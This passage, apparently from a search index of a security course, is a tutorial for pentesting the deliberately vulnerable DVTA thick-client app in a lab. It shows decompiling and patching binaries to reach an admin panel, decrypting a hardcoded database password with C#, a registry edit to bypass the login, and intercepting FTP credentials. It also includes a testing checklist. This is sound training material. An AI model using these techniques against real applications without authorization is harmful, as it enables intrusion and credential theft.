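Once the user exists, a quick check with Python's built-in ftplib verifies that the server accepts the dvta credentials (assuming the FTP service listens on the default port 21; 14148 above is only FileZilla's admin interface):

from ftplib import FTP\n\n# Quick sanity check against the local FileZilla server\nftp = FTP()\nftp.connect('127.0.0.1', 21)\nprint(ftp.login('dvta', 'p@ssw0rd'))  # expect a 230 logged-in reply\nprint(ftp.nlst())  # list the shared folder\nftp.quit()\n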

                                  ","tags":["thick client applications","thick client applications pentesting","labs"]},{"location":"thick-applications/tca-common-vulnerabilities/","title":"Common vulnerabilities","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#application-signing","title":"Application Signing","text":"

To check whether the application is signed, we use the tool sigcheck from the Sysinternals Suite.

                                  From command line we run sigcheck.exe and check if DVTA.exe is signed.

                                  ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#compiler-protection","title":"Compiler protection","text":"

                                  We will use the tool binscope, provided by Microsoft.

                                  Download it from: https://www.microsoft.com/en-us/download/details.aspx?id=44995

                                  Install it by double-clicking on it.

                                  Now from command line:

                                  .\\binscope.exe /verbose /html /logfile c:/path/to/outputreport.html C:/path/to/application/toAudit/DVTA.exe\n

After executing the command you will obtain a report of the basic checks that binscope ran on the application.

                                  ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#automated-source-code-scanning","title":"Automated source code scanning","text":"","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-common-vulnerabilities/#visual-code-grepper","title":"Visual Code Grepper","text":"

                                  Download it from: https://sourceforge.net/projects/visualcodegrepp/

                                  To run a scan:

1. Open the application in dotPeek and export it as a Visual Studio project. This will export the decompiled code of the application to the location we indicate.

2. Open Visual Code Grepper. In the FILE menu, first option, specify the target directory (where we saved the decompiled files). If the error message says \"no files for the specified language\", change the language in the Settings menu (C#).

                                  3. Click on menu Scan> Full scan.

                                  ","tags":["thick client applications","thick client applications pentesting","binscope","visual code grepper"]},{"location":"thick-applications/tca-first-challenge/","title":"First challenge: enabling a button","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.

One thing is still missing after the Basic lab setup: launching the application and making sure that it works. If we do, we will soon see that one step remains before we can start using the DVTA app: setting up the server in the vulnerable application (DVTA).

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#the-problem-a-button-is-not-working","title":"The problem: a button is not working","text":"

If we launch the vulnerable app, DVTA, we will see that the button labelled \"Configure Server\" is not enabled. We will use the tool dnSpy to enable that button.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#using-dnspy-to-see-and-modify-compiled-code","title":"Using dnspy to see and modify compiled code","text":"

1. We will use the 32-bit version of dnSpy, since DVTA is a 32-bit app. Open the 32-bit version of dnSpy, go to FILE > Open > [select the DVTA.exe file], and you will see it in the sidebar of dnSpy:

2. Expand DVTA, go to the decompiled object used in the login and read the code. You will see the function isserverConfigured(). In the tooltip that opens you can also read that this function is receiving a BOOLEAN value.

3. Edit the function's IL instructions.

                                  4. Modify the value of the boolean in the IL instruction.

                                  5. Save the module.

6. Now when you open the DVTA application the button will be enabled and we will be able to set up the server. Our server will be the database server we just configured for our application (127.0.0.1).

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-first-challenge/#making-sure-that-it-works","title":"Making sure that it works","text":"

                                  If we browse the configuration file (DVTA.exe.Config) we will see that the configuration has taken place:
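For instance, the appSettings block should now contain the database server we configured (this value is taken from the DVTA.exe.Config contents reproduced in the information-gathering section):

<add key=\"DBSERVER\" value=\"127.0.0.1\\SQLEXPRESS\" />\n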

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy"]},{"location":"thick-applications/tca-information-gathering-phase/","title":"Information gathering phase - Thick client Applications","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#what-we-will-be-doing","title":"What we will be doing","text":"

                                  1. Understand the functionality of the application.

                                  2. Architecture diagram from the client.

                                  3. Network communications in the app.

                                  4. Files that are being accessed by the client.

                                  5. Interesting files within the application directory.

Tools: CFF Explorer, Wireshark, and the Sysinternals Suite.

                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#ip-addresses-that-the-app-is-communicating-with","title":"IP addresses that the app is communicating with","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#tcp-view","title":"TCP View","text":"

To see which IP addresses the app is communicating with, we can use TCPView from the Sysinternals Suite.

                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#wireshark","title":"Wireshark","text":"

We can also use Wireshark.

                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#language-in-which-the-app-is-built-in","title":"Language in which the app is built in","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#cff-explorer","title":"CFF Explorer","text":"

To see which language the app is built in, and which tool was used, we can use CFF Explorer. Open the app with CFF Explorer.

                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#changes-in-the-filesystem","title":"Changes in the FileSystem","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#procesmonitor","title":"ProcesMonitor","text":"

Use the ProcessMonitor tool from the Sysinternals Suite to see changes in the file system.
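ProcMon can also be driven from the command line; a minimal sketch (flags from the Sysinternals documentation, trace file name illustrative):

.\\Procmon.exe /AcceptEula /BackingFile dvta_trace.pml /Minimized\n# Then filter in the GUI on Process Name = DVTA.exe and Operation = CreateFile/ReadFile/WriteFile\n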

                                  For instance, you can analyze the access to interesting files in the application directory. Now we have this information:

                                  <add key=\"DBSERVER\" value=\"127.0.0.1\\SQLEXPRESS\" />\n<add key=\"DBNAME\" value=\"DVTA\" />\n<add key=\"DBUSERNAME\" value=\"sa\" />\n<add key=\"DBPASSWORD\" value=\"CTsvjZ0jQghXYWbSRcPxpQ==\" />\n<add key=\"AESKEY\" value=\"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\" />\n<add key=\"IV\" value=\"fq20T0gMnXa6g0l4\" />\n<add key=\"ClientSettingsProvider.ServiceUri\" value=\"\" />\n<add key=\"FTPSERVER\" value=\"127.0.0.1\" />\n
                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#locate-credentials-and-information-in-registry-entries","title":"Locate credentials and information in Registry entries","text":"","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#processmonitor","title":"ProcessMonitor","text":"

Use ProcessMonitor from the Sysinternals Suite to locate credentials and information stored in the registry keys. To do so, after clearing all the events in ProcMon (the ProcessMonitor app), close the application and reopen it.

                                  If the session is still there, it means that the session is saved somewhere. In this case the session is saved in the registry keys.

The interesting thing here is the registry key \"isLoggedIn\". We could try to modify the boolean value of that key to bypass the login, as sketched below.
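A minimal sketch from the command line. The HKCU\\dvta path and the value type are assumptions for this lab: use whatever path and type ProcMon actually showed for your build.

# Inspect the value (the key path is an assumption)\nreg query HKCU\\dvta /v isLoggedIn\n# Overwrite it to try to bypass the login (adjust /t and /d to what the query reported)\nreg add HKCU\\dvta /v isLoggedIn /t REG_SZ /d \"true\" /f\n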

                                  Also, check these other tools and resources:

                                  • WinSpy.
                                  • Window Detective
                                  • netspi.com.
                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-information-gathering-phase/#enumerate-libraries-and-resources-employed-in-building-the-app","title":"Enumerate libraries and resources employed in building the app","text":"

When pentesting a thick-client application, I came across this nice way to enumerate libraries, dependencies, sources... By using Sigcheck from the Sysinternals Suite, you can view metadata from the executable images. Additionally, you can save the results to a CSV for reporting purposes.

                                  .\\sigcheck.exe -nobanner -s -e <folder/binaryFile>\n# -s: Search recursively, useful for thick client apps with lot of folders and subfolders\n# -e: Scan executable images only (regardless of their extension)\n# -nobanner:    Do not display the startup banner and copyright message.\n

                                  One cool flag is the recursive one (\"-s\"), which helps you avoid navigating through the folder structure.
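For example, a recursive scan of the whole application folder saved as CSV (the -c switch selects CSV output; the folder path is illustrative):

.\\sigcheck.exe -nobanner -s -e -c C:\\path\\to\\application\\folder > dependencies.csv\n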

                                  ","tags":["thick client applications","thick client applications pentesting","tcp view","wireshark","procesMonitor"]},{"location":"thick-applications/tca-reversing-and-patching/","title":"Reversing and patching thick clients applications","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#reversing-net-applications","title":"Reversing .NET applications","text":"","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#required-software","title":"Required software","text":"
                                  • dnspy: c# code + IL code + patching the application
                                  • dotPeek (from JetBrains)
                                  • ILspy / Reflexil
                                  • ILASM (IL Assembler) (comes with .NET Framework).
                                  • ILDASM (IL Disassembler) (comes with Visual Studio).

                                  IL stands for Intermediate Language.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#installing-visual-studio-community-2019-version-1611","title":"Installing Visual Studio Community 2019 (version 16.11)","text":"

                                  Download from: https://my.visualstudio.com/Downloads?q=Visual%20Studio%202019

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#installing-dotpeek","title":"Installing dotPeek","text":"

dotPeek Cheatsheet. Download from: https://www.jetbrains.com/es-es/decompiler/download/#section=web-installer

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#decompiling-with-dotpeek-executing-with-visual-studio","title":"decompiling with dotPeek + executing with Visual Studio","text":"

We will try to decompile the app using dotPeek in order to decrypt the database connection password. Remember from the config file:

                                        <add key=\"DBPASSWORD\" value=\"CTsvjZ0jQghXYWbSRcPxpQ==\" />\n      <add key=\"AESKEY\" value=\"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\" />\n      <add key=\"IV\" value=\"fq20T0gMnXa6g0l4\" />\n

                                  (The config file was DVTA.exe.Config, located in the same directory as the app).

We will use dotPeek + Visual Studio to understand the logic behind that connection.

Open the DVTA app in dotPeek, go to DVTA > References > DBAccess and double-click it. A resource named DBAccess Class will be loaded; in it there is a function called decryptPassword():

public string decryptPassword()\n    {\n      string s1 = ConfigurationManager.AppSettings[\"DBPASSWORD\"].ToString();\n      string s2 = ConfigurationManager.AppSettings[\"AESKEY\"].ToString();\n      string s3 = ConfigurationManager.AppSettings[\"IV\"].ToString();\n      byte[] inputBuffer = Convert.FromBase64String(s1);\n      AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();\n      cryptoServiceProvider.BlockSize = 128;\n      cryptoServiceProvider.KeySize = 256;\n      cryptoServiceProvider.Key = Encoding.ASCII.GetBytes(s2);\n      cryptoServiceProvider.IV = Encoding.ASCII.GetBytes(s3);\n      cryptoServiceProvider.Padding = PaddingMode.PKCS7;\n      cryptoServiceProvider.Mode = CipherMode.CBC;\n      this.decryptedDBPassword = Encoding.ASCII.GetString(cryptoServiceProvider.CreateDecryptor(cryptoServiceProvider.Key, cryptoServiceProvider.IV).TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));\n      Console.WriteLine(this.decryptedDBPassword);\n      return this.decryptedDBPassword;\n    }\n

So we will open Visual Studio and create a new project, a Windows Forms Application (.NET Framework). We will call the project PasswordDecryptor. Create a button and name it Decrypt.

                                  By double-clicking on the Decrypt button we will be taken to the Source code of that button.

                                  This is what we are going to put in that button:

                                  using System;\nusing System.Collections.Generic;\nusing System.ComponentModel;\nusing System.Data;\nusing System.Drawing;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\nusing System.Security.Cryptography;\n\nnamespace decryptorpassword\n{\n    public partial class Decrypt : Form\n    {\n        public Decrypt()\n        {\n            InitializeComponent();\n        }\n\n        private void button1_Click(object sender, EventArgs e)\n        {\n            string dbpassword = \"CTsvjZ0jQghXYWbSRcPxpQ==\";\n            string  aeskey = \"J8gLXc454o5tW2HEF7HahcXPufj9v8k8\";\n            string iv = \"fq20T0gMnXa6g0l4\";\n            byte[] inputBuffer = Convert.FromBase64String(dbpassword);\n            AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();\n            cryptoServiceProvider.BlockSize = 128;\n            cryptoServiceProvider.KeySize = 256;\n            cryptoServiceProvider.Key = Encoding.ASCII.GetBytes(aeskey);\n            cryptoServiceProvider.IV = Encoding.ASCII.GetBytes(iv);\n            cryptoServiceProvider.Padding = PaddingMode.PKCS7;\n            cryptoServiceProvider.Mode = CipherMode.CBC;\n            string decryptedDBPassword = Encoding.ASCII.GetString(cryptoServiceProvider.CreateDecryptor(cryptoServiceProvider.Key, cryptoServiceProvider.IV).TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));\n            Console.WriteLine(decryptedDBPassword);\n        }\n    }\n}\n

Some things not said in the video: it's quite possible you will need to debug this simple application. For that, the best thing to do is to read the error messages and try to fix them. In my case, a library required by this code was missing:

                                  using System.Security.Cryptography;\n

Also, the form class instantiated in the Main() function needed to be renamed to match my code:

// What it said\n  Application.Run(new Form1());\n// What it needed to say to match my code\n  Application.Run(new Decrypt());\n
                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#decompiling-and-executing-with-dnspy","title":"Decompiling and executing with dnspy","text":"

                                  1. Open the application in dnspy. Go to Login. Click on namespace DBAccess

                                  2. Click on DBAccessClass

3. Locate the function decryptPassword(). That's the one we would love to run. To do so, locate where it is called from and add a breakpoint there. Run the code. You will be asked which executable to run (select DVTA.exe). After that, the code will be executed up to the breakpoint. Enter credentials and see in the notification area how the variables are populated.

                                  Eventually, you will see the decrypted connection string in those variables. You can add more breakpoints.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#using-ilspy-reflexil-to-patch-applications","title":"Using ILSpy + Reflexil to patch applications","text":"","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#ilspy-setup","title":"ILSpy Setup","text":"

                                  Repository: https://github.com/icsharpcode/ILSpy/releases

Requirements: .NET 6.0. Download the zip into your tools folder: place the file ILSpy_binaries_8.0.0.7246-preview3.zip into the tools folder and extract the files.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#setup-reflexil-plugin-in-ilspy","title":"Setup Reflexil plugin in ILSpy","text":"

                                  1. Download from: https://github.com/sailro/Reflexil/releases

2. Place the file reflexil.for.ILSpy.2.7.bin into the tools folder and extract the files.

                                  3. Enter the Reflexil folder and copy the .dll file Reflexil.ILSpy.Plugin.dll.

4. Place it into the ILSpy directory. Now the plugin is installed.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#patching-with-ilspy-reflexil","title":"Patching with ILSpy + Reflexil","text":"

One interesting thing about ILSpy (unlike other tools) is that you can see code in 3 modes: IL, C#, and the combined mode, C# + IL. This last mode comes in handy for interpreting what the code does.

1. Open the DVTA app in ILSpy and locate this code:

Access to the admin panel is decided by an IF statement and an integer variable set to 0/1. We will modify this value using ILSpy + Reflexil and patch the application again.

                                  2. Open Reflexil plugin:

3. In the Reflexil panel, look for the specific instruction (the one that pushes the value 1 onto the stack) and change the value to 0.

                                  4. Save the changes in your DVTA application with a different name:

5. When opening the newly saved application, you will access the admin panel even if you log in with normal user credentials.

                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#using-ilasm-and-ldasm-to-patch-applications","title":"Using ilasm and ldasm to patch applications","text":"

ilasm (IL assembler) and ildasm (IL disassembler) are tools provided by Microsoft with the .NET Framework and Visual Studio.

We will use ILDASM to disassemble the DVTA application:

                                  C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\ildasm.exe\n

And ILASM to reassemble the application:

                                  C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe\n

                                  1. Open DVTA.exe with ILDASM.exe from command line:
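For example, using the ildasm path given above (the DVTA location is illustrative):

& \"C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\ildasm.exe\" C:\\path\\to\\DVTA.exe\n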

2. Dump the disassembly: FILE > Dump.

3. Save that dumped code (which will be IL) into a folder and close the ILDASM application. The generated folder contains the IL code, including a specific file called DVTA.il.

4. Open DVTA.il in a text editor and modify the instruction you are interested in. In our case we will change \"ldc.i4.1\" to \"ldc.i4.0\".

5. From the command line, we will use ILASM to assemble that DVTA.il file into a new application:

                                  cd C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\n.\\ilasm.exe C:\\User\\lala\\Desktop\\RE\\DVTA.il\n
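By default ilasm writes the new executable next to the .il file; the /output switch (a documented ilasm option) lets you pick a different name:

.\\ilasm.exe /output=DVTA_patched.exe C:\\User\\lala\\Desktop\\RE\\DVTA.il\n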
                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-reversing-and-patching/#anti-piracy-measures-implemented-by-some-apps","title":"Anti piracy measures implemented by some apps","text":"

Mechanisms to track or prevent illegitimate copying or usage of the software:

• Does the app use serial keys or license keys to ensure that only an allowed number of users can load and operate the software?
• Does the application stop operating after the expiration of the license or serial key?
• Tracking back the legitimate and illegitimate usage of the application.
                                  ","tags":["thick client applications","thick client applications pentesting","dnspy","dotpeek","ilspy","reflexil","ilasm","idasm"]},{"location":"thick-applications/tca-traffic-analysis/","title":"Traffic analysis - Thick client Applications","text":"

                                  General index of the course

                                  • Introduction.
                                  • Tools for pentesting thick client applications.
                                  • Basic lab setup.
                                  • First challenge: enabling a button.
                                  • Information gathering phase.
                                  • Traffic analysis.
                                  • Attacking thick clients applications.
                                  • Reversing and patching thick clients applications.
                                  • Common vulnerabilities.
                                  ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#tools-needed","title":"Tools needed","text":"
                                  • BurpSuite
                                  • Echo mirage, very old and not maintained.
                                  • mitm_relay
                                  • Wireshark

The difficult part is when the thick app is not using the HTTP/HTTPS protocol. In that case, BurpSuite alone is out of the question and we will need to use:

                                  • wireshark, it's ok if we just want to monitor.
                                  • Echo mirage, very old and not maintained.
                                  • mitm_relay + BurpSuite.
                                  ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-wireshark","title":"Traffic monitoring with Wireshark","text":"

1. We make sure that the FileZilla Server is listening on port 21.

Then we start the capture with Wireshark, open DVTA with admin credentials, and click on \"Back up Data to the FTP Server\". If we filter the capture in Wireshark, leaving only FTP traffic, we will be able to retrieve the user and password in plain text:
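A display filter that narrows the capture to the FTP control channel (field names from Wireshark's built-in FTP dissector):

# Show only FTP control traffic\nftp\n# Or only the lines carrying the credentials\nftp.request.command == \"USER\" || ftp.request.command == \"PASS\"\n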

                                  ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-echo-mirage","title":"Traffic monitoring with Echo mirage","text":"

                                  1. Open Echo Mirage and add a rule to intercept all inbound and outbound traffic in port 21.

                                  2. In TAB \"Process\" > Inject, and select the application.

                                  3. In the vulnerable app DVTA login as admin and click on action \"Backup Data to FTP Server\". Now in Echo Mirage you will be intercepting the traffic. This way we can capture USER and PASSWORD:

Also, by modifying the payload you can tamper with the request.

                                  ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/tca-traffic-analysis/#traffic-monitoring-with-mitm_relay-burpsuite","title":"Traffic monitoring with mitm_relay + Burpsuite","text":"

                                  In DVTA we will configure the server to the IP of the local machine. In my lab setup, my IP was 10.0.2.15.

In the FTP server, we will configure the listening port to 2111. We will also disable the IP check for this lab setup to work.

                                  From https://github.com/jrmdev/mitm_relay:

                                  This is what we're doing:

1. The DVTA application sends traffic to port 21, so to intercept it we configure mitm_relay to listen on port 21.

                                  2. mitm_relay encapsulates the application traffic (no matter the protocol) into HTTP protocol so BurpSuite can read it.

3. Burp Suite will read the traffic, and here we can tamper with it.

4. mitm_relay will \"unfunnel\" the traffic from the HTTP protocol back into the raw one.

5. In a lab setup the FTP server will be in the same network, so to avoid a conflict with mitm_relay we will change the FTP listening port to 2111. In real life this change is not necessary.

                                  Running mitm_relay:

python mitm_relay.py -l 0.0.0.0 -r tcp:21:10.0.2.15:2111 -p 127.0.0.1:8080\n# -l listening address for mitm_relay (0.0.0.0 means listening on all interfaces)\n# -r relay configuration: <protocol>:<listeningPort>:<IPofDestinationServer>:<listeningPortOnDestinationServer>\n# -p proxy configuration: <IPofProxy>:<portOfProxy>\n

And this is what the interception looks like:

                                  ","tags":["thick client applications","thick client applications pentesting","burpsuite","echo mirage","mitm relay","wireshark"]},{"location":"thick-applications/thick-application-checklist/","title":"Thick client Applications Pentesting Checklist","text":"

                                  Source

                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#information-gathering","title":"Information gathering","text":"
                                  **Information Gathering**\n\n- [ ]  Find out the application architecture (two-tier or three-tier)\n- [ ]  Find out the technologies used (languages and frameworks)\n- [ ]  Identify network communication\n- [ ]  Observe the application process\n- [ ]  Observe each functionality and behavior of the application\n- [ ]  Identify all the entry points\n- [ ]  Analyze the security mechanism (authorization and authentication)\n\n**Tools Used**\n\n- [ ]  CFF Explorer\n- [ ]  Sysinternals Suite\n- [ ]  Wireshark\n- [ ]  PEid\n- [ ]  Detect It Easy (DIE)\n- [ ]  Strings\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#gui-testing","title":"GUI testing","text":"
                                  **Test For GUI Object Permission**\n\n- [ ]  Display hidden form object\n- [ ]  Try to activate disabled functionalities\n- [ ]  Try to uncover the masked password\n\n**Test GUI Content**\n\n- [ ]  Look for sensitive information\n\n**Test For GUI Logic**\n\n- [ ]  Try for access control and injection-based vulnerabilities\n- [ ]  Bypass controls by utilizing intended GUI functionality\n- [ ]  Check improper error handling\n- [ ]  Check weak input sanitization\n- [ ]  Try privilege escalation (unlocking admin features to normal users)\n- [ ]  Try payment manipulation\n\n**Tools Used**\n\n- [ ]  UISpy\n- [ ]  Winspy++\n- [ ]  Window Detective\n- [ ]  Snoop WPF\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#file-testing","title":"File testing","text":"
**Test For Files Permission**\n\n- [ ]  Check permission for each and every file and folder\n\n**Test For File Continuity**\n\n- [ ]  Check strong naming\n- [ ]  Authenticate code signing\n\n**Test For File Content Debugging**\n\n- [ ]  Look for sensitive information on the file system (symbols, sensitive data, passwords, configurations)\n- [ ]  Look for sensitive information on the config file\n- [ ]  Look for Hardcoded encryption data\n- [ ]  Look for Clear text storage of sensitive data\n- [ ]  Look for side-channel data leakage\n- [ ]  Look for unreliable log\n\n**Test For File And Content Manipulation**\n\n- [ ]  Try framework backdooring\n- [ ]  Try DLL preloading\n- [ ]  Perform Race condition check\n- [ ]  Test for Files and content replacement\n- [ ]  Test for Client-side protection bypass using reverse engineering\n\n**Test For Function Exported**\n\n- [ ]  Try to find the exported functions\n- [ ]  Try to use the exported functions without authentication\n\n**Test For Public Methods**\n\n- [ ]  Make a wrapper to gain access to public methods without authentication\n\n**Test For Decompile And Application Rebuild**\n\n- [ ]  Try to recover the original source code, passwords, keys\n- [ ]  Try to decompile the application\n- [ ]  Try to rebuild the application\n- [ ]  Try to patch the application\n\n**Test For Decryption And Deobfuscation**\n\n- [ ]  Try to recover original source code\n- [ ]  Try to retrieve passwords and keys\n- [ ]  Test for lack of obfuscation\n\n**Test For Disassemble and Reassemble**\n\n- [ ]  Try to build a patched assembly\n\n**Tools Used**\n\n- [ ]  Strings\n- [ ]  dnSpy\n- [ ]  Procmon\n- [ ]  Process Explorer\n- [ ]  Process Hacker\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#registry-testing","title":"REGISTRY TESTING","text":"
**Test For Registry Permissions**\n\n- [ ]  Check read access to the registry keys\n- [ ]  Check write access to the registry keys\n\n**Test For Registry Contents**\n\n- [ ]  Inspect the registry contents\n- [ ]  Check for sensitive info stored on the registry\n- [ ]  Compare the registry before and after executing the application\n\n**Test For Registry Manipulation**\n\n- [ ]  Try for registry manipulation\n- [ ]  Try to bypass authentication by registry manipulation\n- [ ]  Try to bypass authorization by registry manipulation\n\n**Tools Used**\n\n- [ ]  Regshot\n- [ ]  Procmon\n- [ ]  Accessenum\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#network-testing","title":"NETWORK TESTING","text":"
                                  **Test For Network**\n\n- [ ]  Check for sensitive data in transit\n- [ ]  Try to bypass firewall rules\n- [ ]  Try to manipulate network traffic\n\n**Tools Used**\n\n- [ ]  Wireshark\n- [ ]  TCPview\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#assembly-testing","title":"ASSEMBLY TESTING","text":"
                                  **Test For Assembly**\n\n- [ ]  Verify Address Space Layout Randomization (ASLR)\n- [ ]  Verify SafeSEH\n- [ ]  Verify Data Execution Prevention (DEP)\n- [ ]  Verify strong naming\n- [ ]  Verify ControlFlowGuard\n- [ ]  Verify HighentropyVA\n\n**Tools Used**\n\n- [ ]  PESecurity\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#memory-testing","title":"MEMORY TESTING","text":"
                                  **Test For Memory Content**\n\n- [ ]  Check for sensitive data stored in memory\n\n**Test For Memory Manipulation**\n\n- [ ]  Try for memory manipulation\n- [ ]  Try to bypass authentication by memory manipulation\n- [ ]  Try to bypass authorization by memory manipulation\n\n**Test For Run Time Manipulation**\n\n- [ ]  Try to analyze the dump file\n- [ ]  Check for process replacement\n- [ ]  Check for modifying assembly in the memory\n- [ ]  Try to debug the application\n- [ ]  Try to identify dangerous functions\n- [ ]  Use breakpoints to test each and every functionality\n\n**Tools Used**\n\n- [ ]  Process Hacker\n- [ ]  HxD\n- [ ]  Strings\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#traffic-testing","title":"TRAFFIC TESTING","text":"
                                  **Test For Traffic**\n\n- [ ]  Analyze the flow of network traffic\n- [ ]  Try to find sensitive data in transit\n\n**Tools Used**\n\n- [ ]  Echo Mirage\n- [ ]  MITM Relay\n- [ ]  Burp Suite\n
                                  ","tags":["thick client applications","thick client applications pentesting","checklist"]},{"location":"thick-applications/thick-application-checklist/#common-vulnerabilities-testing","title":"COMMON VULNERABILITIES TESTING","text":"
